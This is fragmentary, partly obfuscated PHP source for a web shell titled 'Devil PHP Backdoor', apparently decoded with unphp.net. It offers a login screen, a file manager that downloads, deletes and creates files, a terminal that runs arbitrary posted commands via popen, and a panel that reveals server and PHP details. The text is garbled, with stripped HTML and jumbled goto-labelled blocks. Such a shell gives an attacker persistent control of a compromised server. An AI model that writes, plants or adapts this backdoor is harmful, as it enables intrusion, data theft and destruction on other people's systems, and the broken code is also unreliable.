/* Decoded by unphp.net */

Login to Devil PHP Backdoor

" method="POST">

Server IP : " . $_SERVER["SERVER_ADDR"] . ""; ?>

Devil PHP Backdoor

System Info File Manager Terminal Logout


" . getcwd(); ?>

"; echo ""; echo ""; echo ""; echo ""; echo ""; } ?>
# Name Size Perm
"; echo $counter; $counter++; echo ""; if (is_dir($dirContent)) { echo "" . $dirContent . "
"; } else { echo $dirContent; echo showDownloadLink($dirContent); echo showDeleteLink($dirContent); } echo "
"; try { if (!is_dir($dirContent)) { $size = filesize($dirContent); if ($size > 1000) { $size /= 1000; if ($size > 1000) { $size /= 1000; echo round($size) . " mb"; } else { echo round($size) . " kb"; } } else { echo $size . " bytes"; } } else { echo "--"; } } catch (Exception $e) { } echo ""; try { echo filePrmissions($dirContent); } catch (Exception $e) { } echo "

                            } elseif (!checkFunctions("popen")) { 
                                $handle = popen(strval($_POST["command"]) . " 2>&1", "r"); 
                                $read = fread($handle, 2096); 
                                echo $read; 
                            } else { 
                                echo "

Sorry, can't execute command !

"; } } ?>
Operating System
Release Name
Version Information
Host Name
Machine Type
PHP Version
PHP Interface
Server IP
Disabled PHP Functions

Welcome to Devil PHP Backdoor

Devil PHP Backdoor
[Download]"; } goto IZkan; Jtz3n: if (isset($_POST["fileName"]) && !empty($_POST["fileName"])) { $dir = getcwd(); if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { $dir = $_GET["chDir"]; } $createFileFlag = createFile($dir, $_POST["fileName"]); } goto CDhow; IZkan: function showDeleteLink($file) { $dir = getcwd(); if (isset($_GET["chDir"])) { $dir = $_GET["chDir"]; } echo "[Delete]"; } goto nslsP; CDhow: if (isset($_POST["folderName"]) && !empty($_POST["folderName"])) { $dir = getcwd(); if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { $dir = $_GET["chDir"]; } $createFolderFlag = createFolder($dir, $_POST["folderName"]); } goto U8v5_; mDIY_: if (isset($_GET["download"]) && !empty($_GET["download"]) && isset($_GET["chDir"])) { downloadFile($_GET["chDir"] . "/" . $_GET["download"]); } goto mQdYc; Yws85: function getFileMime($file) { return mime_content_type($file); } goto DEn3Z; UgpIw: ?>